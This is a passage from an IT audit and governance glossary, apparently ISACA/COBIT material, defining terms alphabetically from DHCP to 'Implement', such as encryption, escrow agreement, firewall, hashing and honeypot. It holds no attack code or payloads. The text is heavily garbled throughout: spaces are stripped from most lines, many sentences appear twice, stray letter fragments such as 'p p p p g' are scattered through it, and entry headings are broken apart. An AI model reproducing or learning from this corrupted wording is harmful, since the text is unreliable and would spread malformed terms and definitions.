suchasthedefaultgateway,subnetmaskandIPaddressesofdomainnamesystem(DNS)
serversfromaDHCPserver
ScopeNote:TheDHCPserverensuresthatallIPaddressesareunique(e.g.,noIPaddressis
assignedtoasecondclientwhilethefirstclient'sassignmentisvalid[itsleasehasnot
expired]).Thus,IPaddresspoolmanagementisdonebytheserverandnotbyahuman
networkadministrator.
Dynamicpartitioning Thevariableallocationofcentralprocessingunit(CPU)processingandmemorytomultiple
applications and data on a server applicationsanddataonaserver
Dynamicports Dynamicand/orprivateports49152through65535:NotlistedbyIANAbecauseoftheir
dynamicnature.
Eavesdropping Listeningaprivatecommunicationwithoutpermission
Echochecks Detectslineerrorsbyretransmittingdatabacktothesendingdeviceforcomparisonwiththe
originaltransmission
Term Definition
Ecommerce Theprocessesbywhichenterprisesconductbusinesselectronicallywiththeircustomers,
suppliers and other external business partners using the Internet as an enabling technology suppliersandotherexternalbusinesspartners,usingtheInternetasanenablingtechnology
ScopeNote:Ecommerceencompassesbothbusinesstobusiness(B2B)andbusinessto
consumer(B2C)ecommercemodels,butdoesnotincludeexistingnonInternetecommerce
methodsbasedonprivatenetworkssuchaselectronicdatainterchange(EDI)andSocietyfor
WorldwideInterbankFinancialTelecommunication(SWIFT).
Economicvalueadd
(EVA)
TechniquedevelopedbyG.BennettStewartIIIandregisteredbytheconsultingfirmofStern,
Stewart,inwhichtheperformanceofthecorporatecapitalbase(includingdepreciated
investmentssuchastraining,researchanddevelopment)aswellasmoretraditionalcapital
investmentssuchasphysicalpropertyandequipmentaremeasuredagainstwhatshareholders
couldearnelsewhere
Editcontrol Detectserrorsintheinputportionofinformationthatissenttothecomputerforprocessing p p p p g
Maybemanualorautomatedandallowtheusertoeditdataerrorsbeforeprocessing
Editing Ensuresthatdataconformtopredeterminedcriteriaandenableearlyidentificationof
potentialerrors
Egress Networkcommunicationsgoingout
Electronicdata
interchange(EDI)
Theelectronictransmissionoftransactions(information)betweentwoenterprises
EDIpromotesamoreefficientpaperlessenvironment.EDItransmissionscanreplacetheuseof
standarddocuments,includinginvoicesorpurchaseorders.
Electronicdocument Anadministrativedocument(adocumentwithlegalvalidity,suchasacontract)inany
graphical,photographic,electromagnetic(tape)orotherelectronicrepresentationofthe
content
ScopeNote:Almostallcountrieshavedevelopedlegislationconcerningthedefinition,useand
legalvalidityofanelectronicdocument.Anelectronicdocument,inwhatevermediathat
containsthedataorinformationusedasevidenceofacontractortransactionbetween
parties,isconsideredtogetherwiththesoftwareprogramcapabletoreadit.Thedefinitionof
l ll lid d i f l ll l d l h i d alegallyvaliddocumentasanyrepresentationoflegallyrelevantdata,notonlythoseprinted
onpaper,wasintroducedintothelegislationrelatedtocomputercrime.Inaddition,many
countriesindefininganddiscipliningtheuseofsuchinstrumentshaveissuedregulations
definingspecifics,suchastheelectronicsignatureanddatainterchangeformats.
Electronicfunds
transfer (EFT)
Theexchangeofmoneyviatelecommunications
transfer(EFT)
EFTreferstoanyfinancialtransactionthatoriginatesataterminalandtransfersasumof
moneyfromoneaccounttoanother
Term Definition
Electronicsignature Anytechniquedesignedtoprovidetheelectronicequivalentofahandwrittensignatureto
demonstrate the origin and integrity of specific data demonstratetheoriginandintegrityofspecificdata
Digitalsignaturesareanexampleofelectronicsignatures.
Electronicvaulting Adatarecoverystrategythatallowsenterprisestorecoverdatawithinhoursafteradisaster
ScopeNote:Typicallyusedforbatch/journalupdatestocriticalfilestosupplementfull
backups taken periodically; includes recovery of data from an offsite storage media that backupstakenperiodically;includesrecoveryofdatafromanoffsitestoragemediathat
mirrorsdataviaacommunicationlink
Ellipticalcurve
cryptography(ECC)
Analgorithmthatcombinesplanegeometrywithalgebratoachievestrongerauthentication
withsmallerkeyscomparedtotraditionalmethods,suchasRSA,whichprimarilyusealgebraic
factoring.
ScopeNote:Smallerkeysaremoresuitabletomobiledevices.
Embeddedaudit
module(EAM)
Integralpartofanapplicationsystemthatisdesignedtoidentifyandreportspecific
transactionsorotherinformationbasedonpredeterminedcriteria
Identificationofreportableitemsoccursaspartofrealtimeprocessing.Reportingmaybereal
timeonlineormayusestoreandforwardmethods.Alsoknownasintegratedtestfacilityor y g y
continuousauditingmodule.
Encapsulation
(objects)
Thetechniqueusedbylayeredprotocolsinwhichalowerlayerprotocolacceptsamessage
fromahigherlayerprotocolandplacesitinthedataportionofaframeinthelowerlayer
Encapsulation
securitypayload(ESP)
Protocol,whichisdesignedtoprovideamixofsecurityservicesinIPv4andIPv6.ESPcanbe
usedtoprovideconfidentiality,dataoriginauthentication,connectionlessintegrity,ananti
l i ( f f i l i i ) d (li i d) ffi fl fid i li replayservice(aformofpartialsequenceintegrity),and(limited)trafficflowconfidentiality.
(RFC4303)
ScopeNote:TheESPheaderisinsertedaftertheIPheaderandbeforethenextlayerprotocol
header(transportmode)orbeforeanencapsulatedIPheader(tunnelmode).
Encryption Theprocessoftakinganunencryptedmessage(plaintext),applyingamathematicalfunctionto
it (encryption algorithm with a key) and producing an encrypted message (ciphertext) it(encryptionalgorithmwithakey)andproducinganencryptedmessage(ciphertext)
Encryptionalgorithm Amathematicallybasedfunctionor
calculationthatencrypts/decryptsdata
Encryptionkey Apieceofinformation,inadigitizedform,usedbyanencryptionalgorithmtoconvertthe
plaintexttotheciphertext
Enduser computing The ability of end users to design and implement their own information system utilizing Endusercomputing Theabilityofenduserstodesignandimplementtheirowninformationsystemutilizing
computersoftwareproducts
Engagementletter FormaldocumentwhichdefinesanISauditor'sresponsibility,authorityandaccountabilityfor
aspecificassignment
Enterprise Agroupofindividualsworkingtogetherforacommonpurpose,typicallywithinthecontextof
anorganizationalformsuchasacorporation,publicagency,charityortrust
Term Definition
Enterprise
architecture (EA)
Descriptionofthefundamentalunderlyingdesignofthecomponentsofthebusinesssystem,
or of one element of the business system (e g technology) the relationships among them architecture(EA) orofoneelementofthebusinesssystem(e.g.,technology),therelationshipsamongthem,
andthemannerinwhichtheysupporttheenterprisesobjectives
Enterprise
architecture(EA)for
IT
DescriptionofthefundamentalunderlyingdesignoftheITcomponentsofthebusiness,the
relationshipsamongthem,andthemannerinwhichtheysupporttheenterprisesobjectives
Enterprisegoal
ScopeNote:SeeBusinessgoal
Enterprise
governance
Asetofresponsibilitiesandpracticesexercisedbytheboardandexecutivemanagementwith
thegoalofprovidingstrategicdirection,ensuringthatobjectivesareachieved,ascertaining
thatriskismanagedappropriatelyandverifyingthattheenterprisesresourcesareused
responsibly
Enterpriserisk Thedisciplinebywhichanenterpriseinanyindustryassesses,controls,exploits,financesand p
management(ERM)
p y p y y , , p ,
monitorsriskfromallsourcesforthepurposeofincreasingtheenterprise'sshortandlong
termvaluetoitsstakeholders
Eradication Whencontainmentmeasureshavebeendeployedafteranincidentoccurs,therootcauseof
theincidentmustbeidentifiedandremovedfromthenetwork.
ScopeNote:Eradicationmethodsinclude:restoringbackupstoachieveacleanstateofthe
system,removingtherootcause,improvingdefensesandperformingvulnerabilityanalysisto
findfurtherpotentialdamagefromthesamerootcause.
ERP(enterprise
resourceplanning)
system
Apackagedbusinesssoftwaresystemthatallowsanenterprisetoautomateandintegratethe
majorityofitsbusinessprocesses,sharecommondataandpracticesacrosstheentire
enterprise,andproduceandaccessinformationinarealtimeenvironment
ScopeNote:ExamplesofERPincludeSAP,OracleFinancialsandJ.D.Edwards.
Error Adeviationfromaccuracyorcorrectness
ScopeNote:Asitrelatestoauditwork,errorsmayrelatetocontroldeviations(compliance
testing)ormisstatements(substantivetesting).
Escrow agent A person agency or enterprise that is authorized to act on behalf of another to create a legal Escrowagent Aperson,agencyorenterprisethatisauthorizedtoactonbehalfofanothertocreatealegal
relationshipwithathirdpartyinregardtoanescrowagreement;thecustodianofanasset
accordingtoanescrowagreement
ScopeNote:Asitrelatestoacryptographickey,anescrowagentistheagencyorenterprise
chargedwiththeresponsibilityforsafeguardingthekeycomponentsoftheuniquekey.
Term Definition
Escrowagreement Alegalarrangementwherebyanasset(oftenmoney,butsometimesotherpropertysuchas
art a deed of title web site software source code or a cryptographic key) is delivered to a art,adeedoftitle,website,softwaresourcecodeoracryptographickey)isdeliveredtoa
thirdparty(calledanescrowagent)tobeheldintrustorotherwisependingacontingencyor
thefulfillmentofaconditionorconditionsinacontract
ScopeNote:Upontheoccurrenceoftheescrowagreement,theescrowagentwilldeliverthe
assettotheproperrecipient;otherwisetheescrowagentisboundbyhis/herfiduciarydutyto
maintain the escrow account Source code escrow means deposit of the source code for the maintaintheescrowaccount.Sourcecodeescrowmeansdepositofthesourcecodeforthe
softwareintoanaccountheldbyanescrowagent.Escrowistypicallyrequestedbyaparty
licensingsoftware(e.g.,licenseeorbuyer),toensuremaintenanceofthesoftware.The
softwaresourcecodeisreleasedbytheescrowagenttothelicenseeifthelicensor(e.g.,seller
orcontractor)filesforbankruptcyorotherwisefailstomaintainandupdatethesoftwareas
promisedinthesoftwarelicenseagreement.
Ethernet Apopularnetworkprotocolandcablingschemethatusesabustopologyandcarriersense
multipleaccess/collisiondetection(CSMA/CD)topreventnetworkfailuresorcollisionswhen
twodevicestrytoaccessthenetworkatthesametime
Event Somethingthathappensataspecificplaceand/ortime
Eventtype ForthepurposeofITriskmanagement,oneofthreepossiblesortsofevents:threatevent,
losseventandvulnerabilityevent
ScopeNote:Beingabletoconsistentlyandeffectivelydifferentiatethedifferenttypesof
eventsthatcontributetoriskisacriticalelementindevelopinggoodriskrelatedmetricsand
wellinformeddecisions.Unlessthesecategoricaldifferencesarerecognizedandapplied,any
resultingmetricslosemeaningand,asaresult,decisionsbasedonthosemetricsarefarmore
likelytobeflawed.
E id 1 I f ti th t di t t d i Evidence 1.Informationthatprovesordisprovesastatedissue
2.InformationthatanauditorgathersinthecourseofperforminganISaudit;relevantifit
pertainstotheauditobjectivesandhasalogicalrelationshiptothefindingsandconclusionsit
isusedtosupport
S N t A dit ti ScopeNote:Auditperspective
Exceptionreports Anexceptionreportisgeneratedbyaprogramthatidentifiestransactionsordatathatappear
tobeincorrect.
ScopeNote:Exceptionreportsmaybeoutsideapredeterminedrangeormaynotconformto
specifiedcriteria.
Term Definition
ExclusiveOR(XOR) TheexclusiveORoperatorreturnsavalueofTRUEonlyifjustoneofitsoperandsisTRUE.
ScopeNote:TheXORoperationisaBooleanoperationthatproducesa0ifitstwoBoolean
inputsarethesame(0and0or1and1)andthatproducesa1ifitstwoinputsaredifferent(1
and0).Incontrast,aninclusiveORoperatorreturnsavalueofTRUEifeitherorbothofits
operandsareTRUE.
Executablecode Themachinelanguagecodethatisgenerallyreferredtoastheobjectorloadmodule Executablecode Themachinelanguagecodethatisgenerallyreferredtoastheobjectorloadmodule
Expertsystem Themostprevalenttypeofcomputersystemthatarisesfromtheresearchofartificial
intelligence
ScopeNote:Anexpertsystemhasabuiltinhierarchyofrules,whichareacquiredfromhuman
expertsintheappropriatefield.Onceinputisprovided,thesystemshouldbeabletodefine
thenatureoftheproblemandproviderecommendationstosolvetheproblem. thenatureoftheproblemandproviderecommendationstosolvetheproblem.
Exploit Fulluseofavulnerabilityforthebenefitofanattacker
Exposure Thepotentiallosstoanareaduetotheoccurrenceofanadverseevent
ExtendedBinary
codedforDecimal
InterchangeCode
An8bitcoderepresenting256characters;usedinmostlargecomputersystems
(EBCDIC)
Extendedenterprise Describesanenterprisethatextendsoutsideitstraditionalboundaries.Suchenterprise
concentrateontheprocessestheydobestandrelyonsomeoneoutsidetheentitytoperform
theremainingprocesses.
eXtensibleAccess
ControlMarkup
L (XACML)
Adeclarativeonlinesoftwareapplicationuseraccesscontrolpolicylanguageimplementedin
ExtensibleMarkupLanguage(XML)
Language(XACML)
eXtensibleMarkup
Language(XML)
PromulgatedthroughtheWorldWideWebConsortium,XMLisawebbasedapplication
developmenttechniquethatallowsdesignerstocreatetheirowncustomizedtags,thus,
enablingthedefinition,transmission,validationandinterpretationofdatabetween
applicationsandenterprises.
Externalrouter Therouterattheextremeedgeofthenetworkundercontrol,usuallyconnectedtoanInternet
service provider (ISP) or other service provider; also known as border router serviceprovider(ISP)orotherserviceprovider;alsoknownasborderrouter.
Externalstorage Thelocationthatcontainsthebackupcopiestobeusedincaserecoveryorrestorationis
requiredintheeventofadisaster
Extranet AprivatenetworkthatresidesontheInternetandallowsacompanytosecurelyshare
businessinformationwithcustomers,suppliersorotherbusinessesaswellastoexecute
electronictransactions
ScopeNote:DifferentfromanIntranetinthatitislocatedbeyondthecompany'sfirewall.
Therefore,anextranetreliesontheuseofsecurelyissueddigitalcertificates(oralternative
methodsofuserauthentication)andencryptionofmessages.Avirtualprivatenetwork(VPN)
andtunnelingareoftenusedtoimplementextranets,toensuresecurityandprivacy.
Term Definition
Failover Thetransferofservicefromanincapacitatedprimarycomponenttoitsbackupcomponent
Failsafe Describesthedesignpropertiesofacomputersystemthatallowittoresistactiveattemptsto
attackorbypassit
Fallbackprocedures Aplanofactionorsetofprocedurestobeperformedifasystemimplementation,upgradeor
modificationdoesnotworkasintended
Scope Note: May involve restoring the system to its state prior to the implementation or ScopeNote:Mayinvolverestoringthesystemtoitsstatepriortotheimplementationor
change.Fallbackproceduresareneededtoensurethatnormalbusinessprocessescontinuein
theeventoffailureandshouldalwaysbeconsideredinsystemmigrationorimplementation.
Fallthroughlogic Anoptimizedcodebasedonabranchpredictionthatpredictswhichwayaprogramwill
branchwhenanapplicationispresented
Falseauthorization Alsocalledfalseacceptance,occurswhenanunauthorizedpersonisidentifiedasan p , p
authorizedpersonbythebiometricsystem
Falseenrollment Occurswhenanunauthorizedpersonmanagestoenrollintothebiometricsystem
ScopeNote:Enrollmentistheinitialprocessofacquiringabiometricfeatureandsavingitasa
personalreferenceonasmartcard,aPCorinacentraldatabase.
Falsenegative Inintrusiondetection,anerrorthatoccurswhenanattackismisdiagnosedasanormalactivity
Falsepositive Aresultthathasbeenmistakenlyidentifiedasaproblemwhen,inreality,thesituationis
normal
Faulttolerance Asystemslevelofresiliencetoseamlesslyreacttohardwareand/orsoftwarefailure
Feasibilitystudy Aphaseofasystemdevelopmentlifecycle(SDLC)methodologythatresearchesthefeasibility
andadequacyofresourcesforthedevelopmentoracquisitionofasystemsolutiontoauser
d need
Fiberopticcable Glassfibersthattransmitbinarysignalsoveratelecommunicationsnetwork
ScopeNote:Fiberopticsystemshavelowtransmissionlossesascomparedtotwistedpair
cables.Theydonotradiateenergyorconductelectricity.Theyarefreefromcorruptionand
lightninginducedinterference,andtheyreducetheriskofwiretaps.
Field An individual data element in a computer record Field Anindividualdataelementinacomputerrecord
ScopeNote:Examplesincludeemployeename,customeraddress,accountnumber,product
unitpriceandproductquantityinstock.
File Anamedcollectionofrelatedrecords
Fileallocationtable
(FAT)
Atableusedbytheoperatingsystemtokeeptrackofwhereeveryfileislocatedonthedisk
(FAT)
ScopeNote:Sinceafileisoftenfragmentedandthussubdividedintomanysectorswithinthe
disk,theinformationstoredintheFATisusedwhenloadingorupdatingthecontentsofthe
file.
Term Definition
Filelayout Specifiesthelengthofthefilerecordandthesequenceandsizeofitsfields
ScopeNote:Alsowillspecifythetypeofdatacontainedwithineachfield;forexample,
alphanumeric,zoneddecimal,packedandbinary.
Fileserver Ahighcapacitydiskstoragedeviceoracomputerthatstoresdatacentrallyfornetworkusers
andmanagesaccesstothosedata
Scope Note: File servers can be dedicated so that no process other than network management ScopeNote:Fileserverscanbededicatedsothatnoprocessotherthannetworkmanagement
canbeexecutedwhilethenetworkisavailable;fileserverscanbenondedicatedsothat
standarduserapplicationscanrunwhilethenetworkisavailable.
FileTransferProtocol
(FTP)
AprotocolusedtotransferfilesoveraTransmissionControlProtocol/InternetProtocol
(TCP/IP)network(Internet,UNIX,etc.)
Filteringrouter Arouterthatisconfiguredtocontrolnetworkaccessbycomparingtheattributesofthe
incomingoroutgoingpacketstoasetofrules g g g p
FIN(Final) Aflagsetinapackettoindicatethatthispacketisthefinaldatapacketofthetransmission
Financialaudit Anauditdesignedtodeterminetheaccuracyoffinancialrecordsandinformation
Finger Aprotocolandprogramthatallowstheremoteidentificationofusersloggedintoasystem
Firewall Asystemorcombinationofsystemsthatenforcesaboundarybetweentwoormorenetworks,
typicallyformingabarrierbetweenasecureandanopenenvironmentsuchastheInternet
Firmware Memorychipswithembeddedprogramcodethatholdtheircontentwhenpoweristurnedoff
Fiscalyear Anyyearlyaccountingperiodwithoutregardtoitsrelationshiptoacalendaryear
Foreignkey Avaluethatrepresentsareferencetoatuple(arowinatable)containingthematching
did k l candidatekeyvalue
ScopeNote:Theproblemofensuringthatthedatabasedoesnotincludeanyinvalidforeign
keyvaluesisknownasthereferentialintegrityproblem.Theconstraintthatvaluesofagiven
foreignkeymustmatchvaluesofthecorrespondingcandidatekeyisknownasareferential
constraint.Therelation(table)thatcontainstheforeignkeyisreferredtoasthereferencing
l ti d th l ti th t t i th di did t k th f d relationandtherelationthatcontainsthecorrespondingcandidatekeyasthereferenced
relationortargetrelation.(Intherelationaltheoryitwouldbeacandidatekey,butinreal
databasemanagementsystems(DBMSs)implementationsitisalwaystheprimarykey.)
Forensicexamination Theprocessofcollecting,assessing,classifyinganddocumentingdigitalevidencetoassistin
theidentificationofanoffenderandthemethodofcompromise
Format checking The application of an edit, using a predefined field definition to a submitted information Formatchecking Theapplicationofanedit,usingapredefinedfielddefinitiontoasubmittedinformation
stream;atesttoensurethatdataconformtoapredefinedformat
Fourthgeneration
language(4GL)
Highlevel,userfriendly,nonproceduralcomputerlanguageusedtoprogramand/orreadand
processcomputerfiles
Term Definition
Framerelay Apacketswitchedwideareanetwork(WAN)technologythatprovidesfasterperformance
than older packetswitched WAN technologies thanolderpacketswitchedWANtechnologies
ScopeNote:Bestsuitedfordataandimagetransfers.Becauseofitsvariablelengthpacket
architecture,itisnotthemostefficienttechnologyforrealtimevoiceandvideo.Inaframe
relaynetwork,endnodesestablishaconnectionviaapermanentvirtualcircuit(PVC).
Framework Framework
ScopeNote:SeeControlframeworkandITgovernanceframework.
Freeware Softwareavailablefreeofcharge
Frequency Ameasureoftheratebywhicheventsoccuroveracertainperiodoftime
Fulleconomiclife
cycle
Theperiodoftimeduringwhichmaterialbusinessbenefitsareexpectedtoarisefrom,and/or
duringwhichmaterialexpenditures(includinginvestments,runningandretirementcosts)are y g p ( g , g )
expectedtobeincurredby,aninvestmentprogram
Functionpoint
analysis
Atechniqueusedtodeterminethesizeofadevelopmenttask,basedonthenumberof
functionpoints
ScopeNote:Functionpointsarefactorssuchasinputs,outputs,inquiriesandlogicalinternal
sites.
Gateway Adevice(router,firewall)onanetworkthatservesasanentrancetoanothernetwork
Generalcomputer
control
AControl,otherthananapplicationcontrol,thatrelatestotheenvironmentwithinwhich
computerbasedapplicationsystemsaredeveloped,maintainedandoperated,andthatis
thereforeapplicabletoallapplications
Theobjectivesofgeneralcontrolsaretoensuretheproperdevelopmentandimplementation
ofapplicationsandtheintegrityofprogramanddatafilesandofcomputeroperations.Like
applicationcontrols,generalcontrolsmaybeeithermanualorprogrammed.Examplesof
generalcontrolsincludethedevelopmentandimplementationofanISstrategyandanIS
securitypolicy,theorganizationofISstafftoseparateconflictingdutiesandplanningfor
di i d disaster prevention and recovery.
Generalizedaudit
software(GAS)
Multipurposeauditsoftwarethatcanbeusedforgeneralprocesses,suchasrecordselection,
matching,recalculationandreporting
Genericprocess
control
Acontrolthatappliestoallprocessesoftheenterprise
Geographicdisk
mirroring
Adatarecoverystrategythattakesasetofphysicallydisparatedisksandsynchronously
mirrors them over highperformance communication lines mirroring mirrorsthemoverhighperformancecommunicationlines
Anywritetoadiskononesidewillresultinawriteontheotherside.Thelocalwritewillnot
returnuntiltheacknowledgmentoftheremotewriteissuccessful.
Term Definition
Geographical
information system
Atoolusedtointegrate,convert,handle,analyzeandproduceinformationregardingthe
surface of the earth informationsystem
(GIS)
surfaceoftheearth
ScopeNote:GISdataexistasmaps,tridimensionalvirtualmodels,listsandtables
Goodpractice Aprovenactivityorprocessthathasbeensuccessfullyusedbymultipleenterprisesandhas
beenshowntoproducereliableresults
Governance Ensuresthatstakeholderneeds,conditionsandoptionsareevaluatedtodeterminebalanced,
agreedon enterprise objectives to be achieved; setting direction through prioritization and agreed onenterpriseobjectivestobeachieved;settingdirectionthroughprioritizationand
decisionmaking;andmonitoringperformanceandcomplianceagainstagreedondirectionand
objectives
ScopeNote:Conditionscanincludethecostofcapital,foreignexchangerates,etc.Options
canincludeshiftingmanufacturingtootherlocations,subcontractingportionsofthe
enterprisetothirdparties,selectingaproductmixfrommanyavailablechoices,etc. enterprisetothird parties,selectingaproductmixfrommanyavailablechoices,etc.
Governanceenabler Something(tangibleorintangible)thatassistsintherealizationofeffectivegovernance
Governance Aframeworkisabasicconceptualstructureusedtosolveoraddresscomplexissues.An
framework enablerofgovernance.Asetofconcepts,assumptionsandpracticesthatdefinehow
somethingcanbeapproachedorunderstood,therelationshipsamongsttheentitiesinvolved,
therolesofthoseinvolved,andtheboundaries(whatisandisnotincludedinthegovernance
system).
ScopeNote:Examples:COBIT,COSOsInternalControlIntegratedFramework
G f A i th t th t i f ti d l t d t h l t d bl Governanceof
enterpriseIT
Agovernanceviewthatensuresthatinformationandrelatedtechnologysupportandenable
theenterprisestrategyandtheachievementofenterpriseobjectives;thisalsoincludesthe
functionalgovernanceofIT,i.e.,ensuringthatITcapabilitiesareprovidedefficientlyand
effectively.
ScopeNote:COBT5perspective
Governance Risk A business term used to group the three close related disciplines responsible for the Governance,Risk
Managementand
Compliance(GRC)
Abusinesstermusedtogroupthethreecloserelateddisciplinesresponsibleforthe
protectionofassets,andoperations
Governance/
managementpractice
ForeachCOBITprocess,thegovernanceandmanagementpracticesprovideacompletesetof
highlevelrequirementsforeffectiveandpracticalgovernanceandmanagementofenterprise
IT.Theyarestatementsofactionsfromgovernancebodiesandmanagement.
Guideline Adescriptionofaparticularwayofaccomplishingsomethingthatislessprescriptivethana
procedure
Hacker Anindividualwhoattemptstogainunauthorizedaccesstoacomputersystem
Term Definition
Handprintscanner Abiometricdevicethatisusedtoauthenticateauserthroughpalmscans
Harden To configure a computer or other network device to resist attacks Harden Toconfigureacomputerorothernetworkdevicetoresistattacks
Hardware Thephysicalcomponentsofacomputersystem
Hashfunction Analgorithmthatmapsortranslatesonesetofbitsintoanother(generallysmaller)sothata
messageyieldsthesameresulteverytimethealgorithmisexecutedusingthesamemessage
asinput
Scope Note: It is computationally infeasible for a message to be derived or reconstituted from ScopeNote:Itiscomputationallyinfeasibleforamessagetobederivedorreconstitutedfrom
theresultproducedbythealgorithmortofindtwodifferentmessagesthatproducethesame
hashresultusingthesamealgorithm.
Hashtotal Thetotalofanynumericdatafieldinadocumentorcomputerfile
Thistotalischeckedagainstacontroltotalofthesamefieldtofacilitateaccuracyof
processing. processing.
Hashing Usingahashfunction(algorithm)tocreatehashvaluedorchecksumsthatvalidatemessage
integrity
Helpdesk Aserviceofferedviatelephone/Internetbyanenterprisetoitsclientsoremployeesthat
providesinformation,assistanceandtroubleshootingadviceregardingsoftware,hardwareor
networks.
ScopeNote:Ahelpdeskisstaffedbypeoplewhocaneitherresolvetheproblemontheirown
orescalatetheproblemtospecializedpersonnel.Ahelpdeskisoftenequippedwithdedicated
customerrelationshipmanagement(CRM)softwarethatlogstheproblemsandtracksthem
untiltheyaresolved.
Heuristicfilter Amethodoftenemployedbyantispamsoftwaretofilterspamusingcriteriaestablishedina
centralizedruledatabase
ScopeNote:Everyemailmessageisgivenarank,basedonitsheaderandcontents,whichis
thenmatchedagainstpresetthresholds.Amessagethatsurpassesthethresholdwillbe
flaggedasspamanddiscarded,returnedtoitssenderorputinaspamdirectoryforfurther
reviewbytheintendedrecipient.
Hexadecimal Anumberingsystemthatusesabaseof16anduses16digits:0,1,2,3,4,5,6,7,8,9,A,B,C,
D E and F D,EandF
Programmersusehexadecimalnumbersasaconvenientwayofrepresentingbinarynumbers.
Hierarchicaldatabase Adatabasestructuredinatree/rootorparent/childrelationship
Scope Note: Each parent can have many children but each child may have only one parent ScopeNote:Eachparentcanhavemanychildren,buteachchildmayhaveonlyoneparent.
Hijacking Anexploitationofavalidnetworksessionforunauthorizedpurposes
Term Definition
Honeypot Aspeciallyconfiguredserver,alsoknownasadecoyserver,designedtoattractandmonitor
intruders in a manner such that their actions do not affect production systems intrudersinamannersuchthattheiractionsdonotaffectproductionsystems
ScopeNote:Alsoknownas"decoyserver"
Horizontaldefensein
depth
Controlsareplacedinvariousplacesinthepathtoaccessanasset(thisisfunctionally
equivalenttoconcentricringmodelabove).
Hotsite Afullyoperationaloffsitedataprocessingfacilityequippedwithbothhardwareandsystem
software to be used in the event of a disaster softwaretobeusedintheeventofadisaster
Hub Acommonconnectionpointfordevicesinanetwork,hubsareusedtoconnectsegmentsofa
localareanetwork(LAN)
ScopeNote:Ahubcontainsmultipleports.Whenapacketarrivesatoneport,itiscopiedto
theotherportssothatallsegmentsoftheLANcanseeallpackets.
Humanfirewall Apersonpreparedtoactasanetworklayerofdefensethrougheducationandawareness p p p y g
Hurdlerate Alsoknownasrequiredrateofreturn,abovewhichaninvestmentmakessenseandbelow
whichitdoesnot
ScopeNote:Oftenbasedonthecostofcapital,plusorminusariskpremium,andoftenvaried
basedonprevailingeconomicconditions
Hybridapplication
controls
Consistofacombinationofmanualandautomatedactivities,allofwhichmustoperateforthe
controltobeeffective
ScopeNote:Sometimesreferredtoascomputerdependentapplicationcontrols
Hyperlink Anelectronicpathwaythatmaybedisplayedintheformofhighlightedtext,graphicsora
buttonthatconnectsonewebpagewithanotherwebpageaddress
H t t A l th t bl l t i d t th t t i f ti t b t d b Hypertext Alanguagethatenableselectronicdocumentsthatpresentinformationtobeconnectedby
linksinsteadofbeingpresentedsequentially,asisthecasewithnormaltext
HypertextMarkup
Language(HTML)
Alanguagedesignedforthecreationofwebpageswithhypertextandotherinformationtobe
displayedinawebbrowser;usedtostructureinformationdenotingcertaintextsureas
headings,paragraphs,listsandcanbeusedtodescribe,tosomedegree,theappearanceand
semantics of a document semanticsofadocument
HypertextTransfer
ProtocolSecure
(HTTPS)
Aprotocolforaccessingasecurewebserver,wherebyalldatatransferredareencrypted.
HypertextTransfer
Protocol(HTTP)
AcommunicationprotocolusedtoconnecttoserversontheWorldWideWeb.Itsprimary
functionistoestablishaconnectionwithawebserverandtransmithypertextmarkup
language (HTML) extensible markup language (XML) or other pages to client browsers language(HTML),extensiblemarkuplanguage(XML)orotherpagestoclientbrowsers
Identityaccess
management(IAM)
Encapsulatespeople,processesandproductstoidentifyandmanagethedatausedinan
informationsystemtoauthenticateusersandgrantordenyaccessrightstodataandsystem
resources.ThegoalofIAMistoprovideappropriateaccesstoenterpriseresources.
Term Definition
Idlestandby Afailoverprocessinwhichtheprimarynodeownstheresourcegroupandthebackupnode
runs idle only supervising the primary node runsidle,onlysupervisingtheprimarynode
ScopeNote:Incaseofaprimarynodeoutage,thebackupnodetakesover.Thenodesare
prioritized,whichmeansthatthesurvivingnodewiththehighestprioritywillacquirethe
resourcegroup.Ahigherprioritynodejoiningtheclusterwillthuscauseashortservice
interruption.
IEEE(Instituteof PronouncedItripleE;IEEEisanorganizationcomposedofengineers,scientistsandstudents IEEE(Instituteof
Electricaland
ElectronicsEngineers)
PronouncedI triple E;IEEEisanorganizationcomposedofengineers,scientistsandstudents
ScopeNote:Bestknownfordevelopingstandardsforthecomputerandelectronicsindustry
IEEE802.11 AfamilyofspecificationsdevelopedbytheInstituteofElectricalandElectronicsEngineers
(IEEE)forwirelesslocalareanetwork(WLAN)technology.802.11specifiesanovertheair ( ) ( ) gy p
interfacebetweenawirelessclientandabasestationorbetweentwowirelessclients.
Imageprocessing Theprocessofelectronicallyinputtingsourcedocumentsbytakinganimageofthedocument,
therebyeliminatingtheneedforkeyentry
Imaging Aprocessthatallowsonetoobtainabitforbitcopyofdatatoavoiddamageoforiginaldata
orinformationwhenmultipleanalysesmaybeperformed.
ScopeNote:Theimagingprocessismadetoobtainresidualdata,suchasdeletedfiles,
fragmentsofdeletedfilesandotherinformationpresent,fromthediskforanalysis.Thisis
possiblebecauseimagingduplicatesthedisksurface,sectorbysector.
Impact Magnitudeoflossresultingfromathreatexploitingavulnerability
I t l i A t d t i iti th iti lit f i f ti f th t i b d t Impactanalysis Astudytoprioritizethecriticalityofinformationresourcesfortheenterprisebasedoncosts
(orconsequences)ofadverseevents
Inanimpactanalysis,threatstoassetsareidentifiedandpotentialbusinesslossesdetermined
fordifferenttimeperiods.Thisassessmentisusedtojustifytheextentofsafeguardsthatare
requiredandrecoverytimeframes.Thisanalysisisthebasisforestablishingtherecovery
t t strategy.
Impactassessment Areviewofthepossibleconsequencesofarisk
ScopeNote:SeealsoImpactanalysis.
Impairment Aconditionthatcausesaweaknessordiminishedabilitytoexecuteauditobjectives
Scope Note: Impairment to organisational independence and individual objectivity may ScopeNote:Impairmenttoorganisationalindependenceandindividualobjectivitymay
includepersonalconflictofinterest;scopelimitations;restrictionsonaccesstorecords,
personnel,equipment,orfacilities;andresourcelimitations(suchasfundingorstaffing).
Term Definition
Impersonation AsecurityconceptrelatedtoWindowsNTthatallowsaserverapplicationtotemporarily"be"
the client in terms of access to secure objects theclientintermsofaccesstosecureobjects
ScopeNote:Impersonationhasthreepossiblelevels:identification,lettingtheserverinspect
theclient'sidentity;impersonation,lettingtheserveractonbehalfoftheclient;and
delegation,thesameasimpersonationbutextendedtoremotesystemstowhichtheserver
connects(throughthepreservationofcredentials).Impersonationbyimitatingorcopyingthe
identification behavior or actions of another may also be used in social engineering to obtain identification,behaviororactionsofanothermayalsobeusedinsocialengineeringtoobtain
otherwise unauthorized physical access.
Implement Inbusiness,includesthefulleconomiclifecycleoftheinvestmentprogramthrough
retirement;(i.e.,whenthefullexpectedvalueoftheinvestmentisrealized,asmuchvalueasis
